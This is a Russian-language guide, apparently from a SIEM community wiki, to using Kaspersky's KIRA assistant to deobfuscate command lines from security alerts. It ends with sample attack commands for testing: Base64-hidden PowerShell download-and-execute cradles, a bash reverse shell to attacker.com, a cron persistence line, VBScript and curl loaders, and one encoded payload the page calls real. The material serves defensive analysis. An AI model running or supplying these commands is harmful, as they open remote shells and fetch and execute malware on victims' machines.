# Работа с KIRA и примеры использования (юзкейсы)

<p class="callout info">Видео по работе KIRA и преимущества - [https://box.kaspersky.com/f/48a6de7a26044d9ea60c/](https://box.kaspersky.com/f/48a6de7a26044d9ea60c/) </p>

Kaspersky Investigation and Response Assistant предоставляет аналитикам инструменты для оперативного декодирования и деобфускации строк выполнения, извлечённых из событий безопасности в режиме реального времени. Данное решение оптимизирует процесс приоритизации инцидентов, сокращая время на анализ сложных данных, и снижает квалификационные требования для аналитиков первого уровня, что повышает общую эффективность системы реагирования на инциденты.

Ключевые преимущества:

- Ускорение цикла принятия решений;
- Снижение зависимости от высокой экспертизы сотрудников;
- Повышение точности ранжирования алертов.

---

### Как пользоваться

Перейдите из сработки алерта во все его события по кнопке **Найти в событиях**

![image.png](https://kb.kuma-community.ru/uploads/images/gallery/2025-04/scaled-1680-/eVIimage.png)

Далее, либо в корреляционном событии, либо в базовом на интеремующем поле нажать на "три точки" и затем проанализировать:

![image.png](https://kb.kuma-community.ru/uploads/images/gallery/2025-04/scaled-1680-/eBmimage.png)

Возможность редактирования запроса перед отправкой в KIRA обеспечивает дополнительный уровень контроля над конфиденциальностью данных. Это особенно важно в случаях, когда анализируемые строки кода содержат чувствительную информацию, такую как персональные данные, учетные записи или ключи доступа.

![image.png](https://kb.kuma-community.ru/uploads/images/gallery/2025-04/scaled-1680-/KqMimage.png)

По кнопке **Действия** можно посмотреть отчет о деобфускации:

![image.png](https://kb.kuma-community.ru/uploads/images/gallery/2025-04/scaled-1680-/mYNimage.png)

---

### Примеры команд

<p class="callout warning">Команды не рабочие все ссылки заменены, но это не отменяет перепроверку и аккуратность использования</p>

#### Простая обфускация с использованием строк

```plaintext
$e=([char]0x68+[char]0x65+[char]0x6C+[char]0x6C+[char]0x6F);iex $e
```

#### Использование Base64 для кодирования

```plaintext
powershell.exe -Command "$s = [Sy\u0073tem.Text.En\u0063oding]::ASCII.GetString([Sy\u0073tem.Convert]::FromBase64String('aHR0cHM6Ly9tYWwwd2FyZS5ydS9wYXlsb2FkX3NvbWU=')); iwr $s -UseBasicParsing | iex"
```

#### Использование Base64 для кодирования с праметрами запуска PS

```plaintext
powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass -W Hidden -Command "$s = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2FiYzkxMXRlc3RLSVJBbGluay5jb20vZC9iYWNrZG9vcjEyMy5leGU=')); iwr $s -OutFile backdoor.exe; Start-Process .\backdoor.exe"
```

#### Использование строковых манипуляций для скрытия команды

```plaintext
$cmd = 'powershell.exe -nop -w hidden -e ' + [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes('Invoke-WebRequest "http://evil-some.com/malicious123.exe" -OutFile "malicious.exe"; Start-Process "malicious.exe"'))) iex ($cmd)
```

#### Использование альтернативных имен для стандартных команд

```plaintext
$cmd = New-Object System.Net.WebClient; $cmd.DownloadFile("http://evil-some.com/payload123.exe", "C:\path\to\payload.exe")
```

#### Обратный Shell (доступ через бэкдор)

```plaintext
bash -i >& /dev/tcp/attacker.com/4444 0>&1
```

#### Скрытие вредоносных заданий Cron

```plaintext
echo "*/5 * * * * curl bad.site/payload.sh | bash" >> /var/spool/cron/root
```

#### <span class="qwen-markdown-strong"><span class="qwen-markdown-text">Полезная нагрузка с загрузкой и выполнением через VBScript</span></span>

```
cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://example.com:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\ny.vbs" && "%temp%\ny.vbs"
```

#### <span class="qwen-markdown-strong"><span class="qwen-markdown-text">Вредоносная полезная нагрузка на VBScript с загрузкой и выполнением из веба</span></span>

```
cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://example.com:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%wk.vbs" && "%temp%wk.vbs"
```

#### <span class="qwen-markdown-strong"><span class="qwen-markdown-text">Обфусцированная PowerShell-полезная нагрузка с загрузкой и выполнением</span></span>

<p class="callout warning"><span class="qwen-markdown-strong"><span class="qwen-markdown-text">Выполняйте команду только в изолированной среде, она является реальным примером</span></span></p>

```
powershell -wind mi -Enc JwBhACcALAAnAHoAJwB8ACUAewAuACcAaQBlAHgAJwAoACgAKAAiAHcAaQB3AHIAbQAgADcANgAzADYAMwA4ADEAOQAxAC8AbABvAG0ALwAkAF8ALgBnAHcAaQBmAHwAdwBpAHcAZQB3AHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACcAdwAnACwAJwAnACkAKQApAH0A
```

#### <span class="qwen-markdown-strong"><span class="qwen-markdown-text">Загрузчик VBScript в Windows через curl</span></span>

```
cmd /c "curl -s http:/example.com:5506/dd.vbs -o %temp%dd.vbs >nul && start /b wscript.exe //B //E:VBScript %temp%dd.vbs && exit"
```

```
cmd /c "curl -s http:/example.com:5506/dd.vbs -o %temp%dd.vbs >nul && start /b wscript.exe //B //E:VBScript %temp%dd.vbs && exit"
```